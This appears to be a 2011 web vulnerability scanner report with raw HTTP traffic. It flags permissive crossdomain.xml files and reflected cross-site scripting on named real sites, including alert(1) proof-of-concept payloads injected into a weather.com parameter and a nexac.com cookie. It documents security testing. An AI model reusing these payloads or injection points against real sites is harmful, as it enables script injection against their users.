HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" Content-Type: text/html Vary: Accept-Encoding Content-Length: 13478 Cache-Control: public, max-age=3600 Expires: Sun, 15 May 2011 21:26:50 GMT Date: Sun, 15 May 2011 20:26:50 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... {} function Window_onResize(){} function ShowMailForm(rnSCID var sUrl=gsOUrl+'/mailform document.location=sUrl; } function cii_ShowLocations(rnSCID ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sony.tt.omtrdc.net |
Path: | /m2/sony/mbox/ajax |
GET /m2/sony/mbox/ajax Host: sony.tt.omtrdc.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com |
HTTP/1.1 200 OK Content-Type: text/JavaScript Content-Length: 308 Date: Sun, 15 May 2011 21:21:23 GMT Server: Test & Target mboxFactories.get( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /m2/sonycomputerentertai Host: sonycomputerentertai.tt Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 204 Date: Sun, 15 May 2011 20:27:35 GMT Server: Test & Target mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /m2/sonycomputerentertai Host: sonycomputerentertai.tt Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 264 Date: Sun, 15 May 2011 20:28:46 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /m2/sonycomputerentertai Host: sonycomputerentertai.tt Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 261 Date: Sun, 15 May 2011 20:28:48 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB24 Cache-Control: public, must-revalidate, max-age=1000 Last-Modified: Wed, 04 May 2011 15:16:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 5831 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:19:53 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB25 Cache-Control: public, must-revalidate, max-age=1000 Last-Modified: Wed, 04 May 2011 15:16:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 5831 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:20:07 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB25 Cache-Control: public, must-revalidate, max-age=1000 Last-Modified: Wed, 04 May 2011 15:16:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 5831 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:22:16 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB21 Cache-Control: public, must-revalidate, max-age=1000 Last-Modified: Wed, 04 May 2011 15:16:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 5831 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:20:17 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish v3 CW-Server: CW-APP202 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Fri, 13 May 02011 21:49:10 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 5916 Date: Mon, 16 May 2011 01:22:22 GMT Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:02 GMT; Path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB26 Cache-Control: public, must-revalidate, max-age=1000 Last-Modified: Wed, 04 May 2011 15:16:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 5831 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:20:00 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish v3 CW-Server: CW-APP201 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Sat, 14 May 02011 11:14:24 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 5944 Date: Mon, 16 May 2011 01:22:27 GMT Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:07 GMT; Path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" X-Powered-By: ASP.NET CW-Server: CW-WEB22 Cache-Control: public, must-revalidate, max-age=1000 Last-Modified: Wed, 04 May 2011 15:16:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 5832 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:20:27 GMT Connection: close Set-Cookie: cw=cw; domain=.contextweb.com; path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.contextweb.com |
Path: | /TagPublish/getjs.aspx |
GET /TagPublish/getjs.aspx Host: tag.contextweb.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish v3 CW-Server: CW-APP205 Cache-Control: max-age=10000, public, must-revalidate Last-Modified: Fri, 13 May 02011 21:46:58 EDT Content-Type: application/x-javascript P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Date: Mon, 16 May 2011 01:21:25 GMT Content-Length: 5916 Connection: close Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:08:05 GMT; Path=/ function cw_Process(){try{var cu="http://tag.contextweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://wow.weather.com |
Path: | /weather/wow/module |
GET /weather/wow/module Host: wow.weather.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:20:23 GMT Server: Apache SVRNAME: web2x07 Vary: Accept-Encoding Content-Length: 5721 Content-Type: text/html if (document.getElementById && !document.getElementById( { var head = document.getElements var link = document.createElement( ...[SNIP]... <A HREF="http://wowweb ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://wow.weather.com |
Path: | /weather/wow/module |
GET /weather/wow/module Host: wow.weather.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:21:09 GMT Server: Apache SVRNAME: web2x06 Vary: Accept-Encoding Content-Length: 5483 Content-Type: text/html if (document.getElementById && !document.getElementById( { var head = document.getElements var link = document.createElement( ...[SNIP]... d, moduleHTML) } else { document.getElementById document.getElementById } } init('wx_modulee1b30';alert(1)/ ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: http://www.google.com Cookie: TS5bbf46=f5a3eb9e27e |
HTTP/1.1 200 OK ntCoent-Length: 87894 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 87894 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:25:50 GMT Connection: keep-alive Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... <input type="hidden" value="http://www.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://f.nexac.com |
Path: | /e/a-677/s-2140.xgi |
GET /e/a-677/s-2140.xgi?na Host: f.nexac.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: na_id=326a9"><script>alert(1)< |
HTTP/1.1 200 OK Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ Set-Cookie: na_id=326a9%22%3E Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:39:13 GMT; path=/; domain=.nexac.com Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:39:13 GMT; path=/; domain=.nexac.com X-Powered-By: Jigawatts Content-type: text/html Date: Mon, 16 May 2011 01:39:13 GMT Server: lighttpd/1.4.18 Content-Length: 541 <html> <head> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> </head> <body> <iframe name="__bknsframe" src="http://tags.bluekai ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/dk.js |
GET /a/dk.js?defaulting_ad Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2146=xn7ja41kw4n |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:22:18 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4462/5032; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=2; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110261; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3179363.js^2 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 1283 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3179363" ...[SNIP]... <img src=\"http://trgca.opt ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://0.gravatar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 0.gravatar.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=300 Content-Type: application/xml Date: Mon, 16 May 2011 01:24:43 GMT Expires: Mon, 16 May 2011 01:29:43 GMT Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT Server: ECS (dca/532A) X-Cache: HIT Content-Length: 261 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://6e8d64.r.axf8.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 6e8d64.r.axf8.net |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 20 Jul 2010 09:32:23 GMT Accept-Ranges: bytes ETag: "56b3a475ee27cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 01:32:50 GMT Connection: close Content-Length: 153 <?xml version="1.0"?> <!-- http://www.adobe.com <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: a.tribalfusion.com |
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/xml Content-Length: 102 Connection: Close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad-emea.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT Date: Mon, 16 May 2011 01:19:40 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.doubleclick <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net |
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT Date: Sun, 15 May 2011 21:21:44 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.doubleclick <cross-domain-policy> ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ad.turn.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: private Pragma: private Expires: Mon, 16 May 2011 01:19:50 GMT Content-Type: text/xml;charset=UTF-8 Date: Mon, 16 May 2011 01:19:49 GMT Connection: close <?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: admeld.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:40 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3420415245200633085 Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ahome.disney.go.com |
HTTP/1.0 200 OK Cache-Control: max-age=10 Date: Mon, 16 May 2011 01:29:22 GMT Content-Type: text/xml; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:29:15 GMT Accept-Ranges: bytes ETag: W/"8027cdaa6813cc1:10eb" Server: Microsoft-IIS/6.0 From: DOLDISWEB10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=60D33DE2-6672-4C5F Cache-Expires: Mon, 16 May 2011 01:29:25 GMT X-UA-Compatible: IE=EmulateIE7 Content-Length: 453 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="dolimg.com" /> <allow-access-from domain="a.dolimg.com" /> <allow-access-from domain="home.disney.go.com" /> <allow-access-from domain="disney.go.com" /> <allow-access-from domain="hb.disney.go.com" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ajax.googleapis |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com |
HTTP/1.0 200 OK Expires: Sun, 15 May 2011 20:42:29 GMT Date: Sat, 14 May 2011 20:42:29 GMT Content-Type: text/x-cross-domain X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 85448 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://aperture |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: aperture.displaymark |
HTTP/1.0 200 OK Content-Length: 268 Content-Type: text/xml Content-Location: http://aperture Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT Accept-Ranges: bytes ETag: "88db83a088fca1:fe8" Server: Microsoft-IIS/6.0 X-Server: D2G.NJ-a.dm.com_x P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI" X-Powered-By: ASP.NET Expires: Mon, 16 May 2011 01:22:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 16 May 2011 01:22:07 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <site-control perm ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.ak.facebook |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: api.ak.facebook.com |
HTTP/1.0 200 OK Content-Type: application/xml X-FB-Server: 10.36.9.114 X-Cnection: close Cache-Control: max-age=86400 Expires: Tue, 17 May 2011 01:25:14 GMT Date: Mon, 16 May 2011 01:25:14 GMT Content-Length: 280 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <site- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Mon, 16 May 2011 21:31:00 GMT Date: Sun, 15 May 2011 21:31:00 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 ETag: W/"384-1279190954000" Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT Content-Type: application/xml Content-Length: 384 Date: Mon, 16 May 2011 01:19:50 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.contxtweb.com --> <cross-domain-policy> <site-contro ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c7.zedo.com |
